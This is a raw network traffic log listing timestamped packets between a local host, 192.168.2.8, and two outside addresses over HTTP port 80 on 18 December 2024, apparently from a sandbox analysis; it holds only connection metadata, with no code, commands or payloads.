Dec 18, 2024 13:38:48.769562960 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.769718885 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.770591974 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.770672083 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.770754099 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.770843983 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.770967007 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.771914959 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.772033930 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.772058010 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.772109032 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.773026943 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.773097038 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.773219109 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.773304939 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.774207115 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.774410009 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.774477005 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.775415897 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.775734901 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.775815964 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.776638985 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.776706934 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.776737928 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.777738094 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.777861118 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.777889967 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.778069019 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.778933048 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.779098034 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.779227972 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.780092955 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.780251026 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.780364990 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.781213999 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.781436920 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.781495094 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.782521963 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.782622099 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.782677889 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.783600092 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.783689976 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.783781052 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.784883022 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.784900904 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.784997940 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.784997940 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.785938978 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.786099911 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.786289930 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.787126064 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.787303925 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.787378073 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.788362980 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.788429022 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.788463116 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.789422035 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.789477110 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.789624929 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.789848089 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.790611982 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.790909052 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.791037083 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.791764021 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.792033911 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.792104006 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.792973995 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.793035030 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.793194056 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.794157028 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.794158936 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.794313908 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.794338942 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.794455051 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.795877934 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.795948982 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.796173096 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.796231031 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.797063112 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.797122955 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.797151089 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.797261000 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.797924042 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.797996998 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.798077106 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.798116922 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.798855066 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.799004078 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.799055099 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.800055027 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.800149918 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.800378084 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.801160097 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.801203012 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.801389933 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.802582979 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.802628994 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.802628994 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.802809000 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.802889109 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.804126978 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.804145098 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.804204941 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.804204941 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.805012941 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.805146933 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.805180073 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.805824995 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.806011915 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.806138039 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.806217909 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.806288004 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.806988955 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.807209015 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.807236910 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.807342052 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.808332920 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.808348894 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.808404922 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.808423042 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.809369087 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.809590101 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.809602976 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.809731007 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.810551882 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.810657024 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.810735941 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.811805964 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.811865091 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.811942101 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.812824011 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.812881947 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.813021898 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.814014912 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.814043045 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.814102888 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.814362049 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.814420938 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.815140963 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.815340996 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.815361023 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.815613985 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.816324949 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.816602945 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.816608906 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.816714048 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.817507982 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.817586899 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.817785978 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.818541050 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.818553925 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.818674088 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.818697929 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.818943024 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.818959951 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.819009066 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.819417953 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.819437981 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.819452047 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.819464922 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.819478989 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.819492102 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.819504976 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.819535971 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.819549084 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.819561958 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.819575071 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.819587946 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.819601059 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.819613934 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.819629908 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.819643021 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.819654942 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.819668055 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.819799900 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.819816113 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.819829941 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.819844961 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.819992065 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.820358992 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.820420027 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.820497036 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.820509911 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.820523977 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.820537090 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.820550919 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.820557117 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.820611000 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.820624113 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.820636034 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.820648909 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.820661068 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.820673943 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.820749998 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.820770025 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.820784092 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.820796013 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.820810080 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.820822954 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.820837021 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.820852041 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.820863962 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.820875883 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.820983887 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.820997000 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.821010113 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.821068048 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.821154118 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.821403027 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.821934938 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.821963072 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.821976900 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.821990013 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.822002888 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.822242975 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.822319031 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.822360039 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.822468042 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.823358059 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.823523045 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.823617935 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.824498892 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:48.824512005 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.824587107 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:48.824690104 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.825193882 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.825798035 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.825876951 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.826061010 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.826827049 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.826893091 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.835344076 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.835356951 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.835465908 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.835479021 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.835726023 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.835747004 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.835773945 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.835829020 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.835922956 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.835963964 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.836105108 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.836174965 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.836213112 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.836251974 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.836373091 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.836425066 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.836508989 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.836523056 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.836630106 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.836642981 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.836765051 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.836777925 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.836967945 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.836981058 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.837085009 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.837097883 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.837188005 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.837201118 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.837243080 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.837302923 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.837393045 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.837405920 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.837532043 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.837546110 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.837568998 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.837582111 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.837646961 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.837658882 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.837735891 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.837760925 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.837829113 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.837852955 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.837902069 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.837965012 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.838085890 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.838099957 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.838212013 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.838227987 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.838273048 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.838285923 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.838349104 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.838434935 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.838449001 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.838579893 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.845602989 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:48.944354057 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.944555044 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.944566011 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.944657087 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.944668055 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.944771051 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.944832087 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.944907904 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.944919109 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.945003033 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.945115089 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.945200920 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.945211887 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.945382118 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.945391893 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.945450068 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.945461035 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.945583105 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.945594072 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.945792913 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.945804119 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.945946932 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.945956945 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.946067095 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.946078062 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.946182966 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.946192980 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.946388960 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.946404934 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.946424007 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.946472883 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.946547985 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.946557999 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.946717024 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.946727037 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.946880102 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.946892023 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.946966887 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.947081089 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.947092056 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.947134972 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.947145939 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.947257042 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.947282076 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.947292089 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.947451115 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.947509050 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.954641104 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.954701900 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.954873085 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.954920053 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.955024958 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.955073118 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.955101013 CET	80	49725	185.185.71.170	192.168.2.8
